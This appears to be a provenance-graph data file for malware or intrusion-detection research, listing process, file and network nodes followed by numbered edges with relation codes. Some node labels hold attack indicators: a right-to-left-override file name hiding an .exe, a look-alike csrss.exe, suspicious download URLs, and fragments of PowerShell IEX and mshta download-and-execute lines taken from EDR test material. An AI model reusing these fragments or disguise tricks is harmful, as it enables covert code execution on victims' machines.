52
MP-Xenos.exe 
MP-hh.exe
MP-ORDER_LIST#0710023_FULLY_GLOBAL_INC_LIMITED‮gpj.exe 
MF-C:\Users\admin\AppData\Roaming\CareUEyes\CareUEyes.exe
SF-C:\Users\admin\AppData\Local\Temp\Purchase_ORDERS087
SO-1.2.840.113556
MF-Files\Hantek2xx2\Driver\Win10\Hantek2D42IA64.sys
SO-http://fbi.fund/dark.exe
SO-10.0.0.00000
MF-\Windows\System32\cmd.exe
TP-WinRAR.exe
MF-files\documents\jury.mp3
MF-C:\Users\admin\AppData\Roaming\Opera Software\Opera Stable\Crash
MF-reg.exe
TF-C:\Users\admin\AppData\Local\Temp\PO
TP*-cipher.exe
MP-avi_previewer_demo.exe
SO-10.0.0.00000
SO-file://PathToAtomicsFolder\T1137.004\src\T1137.004.html
MP-shutdown.exe
SF-C:\Users\admin\AppData\Local\Temp\Overbygningsuddannelsens.exe
MF-C:\Program files\appdata\local\temp\20342.bmp
SO-http://199.247.25.79/get.php
TF-PathToAtomicsFolder\T1090.003\src\Psiphon.bat
MF-C:\Users\admin\AppData\Local\Temp\86270699bad2681bb3f5f57f44a7094e
SF-C:\Users\Public\coinmarketcap\imcq
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close
MP-WinRAR.exe 
SF-C:\Users\admin\AppData\Local\Temp\fast1nject.exe
MP-nvvsvc.exe 
MP-Invoice.exe 
MF-files\appdata\local\temp\7zsfx000.cmd
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-сsrss.exe 
TP*-default-browser-agent.exe
MP-ns9BE4.tmp
TP-powercfg.exe
MP-AnyDesk-a444ebcf.exe 
TP-renamer-7.5.exe
MP*-0IuqaJTsFmOw8k4.exe
MP-SecuriteInfo.com.Win32.TrojanX-gen.16332.13417.exe 
SO-http://199.247.25.79/get.php
MP-Order specification.exe
MF-window.c
SO-42.021.871.591
TF-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
MP-EQNEDT32.EXE
TP-net1.exe
MP-Regasm.exe
MP*-chrome.exe 
SF-C:\MSOCache\All Users\{90140000-0044-0411-0000-0000000FF1CE}-C\WinRAR.exe
MP-сsrss.exe 
136
0 1 FR-1
0 2 FR-1
1 2 UK-1
0 3 WR-1
0 4 CD-1
0 5 ST-1
0 6 WR-1
7 0 RF-1
0 8 ST-1
0 9 UK-1
10 3 RD-1
10 4 WR-1
10 5 ST-1
10 6 WR-1
10 7 ST-1
10 8 ST-1
10 11 WR-1
10 12 RD-1
10 13 RD-1
10 14 WR-1
5 15 RF-1
15 6 WR-1
15 7 ST-1
15 8 ST-1
10 15 IJ-1
15 11 WR-1
15 12 RD-1
15 13 WR-1
15 14 WR-1
16 6 WR-1
7 16 RF-1
8 16 RF-1
10 16 UK-1
15 17 ST-1
15 18 ST-1
19 11 WR-1
19 12 WR-1
19 13 CD-1
19 14 CD-1
15 19 IJ-1
19 17 ST-1
19 18 ST-1
15 20 WR-1
19 20 EX-1
15 21 RD-1
19 21 WR-1
22 15 RF-1
19 22 ST-1
15 23 RD-1
19 23 RD-1
15 24 UK-1
19 25 RD-1
19 26 ST-1
27 17 ST-1
27 18 ST-1
27 20 EX-1
27 21 WR-1
27 22 ST-1
27 23 RD-1
27 25 WR-1
27 26 ST-2
19 28 RD-1
27 28 EX-1
19 29 FR-1
29 20 EX-1
29 21 UK-1
30 20 UK-1
27 31 RD-1
32 27 RF-1
33 23 CD-1
33 25 WR-1
33 26 ST-2
27 33 UK-1
34 25 CD-2
26 34 RF-2
34 28 EX-2
34 31 RD-2
34 32 ST-2
35 25 EX-2
26 35 RF-2
35 28 RD-2
35 31 EX-2
32 35 RF-2
34 35 UK-2
26 36 RF-2
36 28 WR-2
36 31 RD-2
32 36 RF-2
37 28 RD-2
37 31 RD-2
32 37 RF-2
36 37 UK-2
38 28 RD-2
38 31 WR-2
38 32 ST-2
39 31 EX-3
32 39 RF-2
38 39 IJ-2
40 31 EX-3
32 40 RF-2
38 40 IJ-2
38 41 ST-3
41 39 RF-3
41 40 RF-3
42 32 ST-3
38 42 UK-2
39 43 WR-3
40 43 WR-3
39 44 ST-3
44 40 RF-3
39 45 WR-3
40 45 WR-3
39 46 FR-3
40 46 UK-3
39 47 FR-3
47 41 ST-4
47 43 CD-3
44 47 RF-3
47 45 RD-3
39 48 FR-3
41 48 RF-3
48 43 WR-3
48 44 ST-3
48 45 WR-3
47 48 UK-3
39 49 FR-3
41 49 RF-4
49 43 RD-4
44 49 RF-3
49 45 WR-4
49 50 WR-4
51 41 ST-4
51 43 WR-4
44 51 RF-3
51 45 WR-4
49 51 UK-4

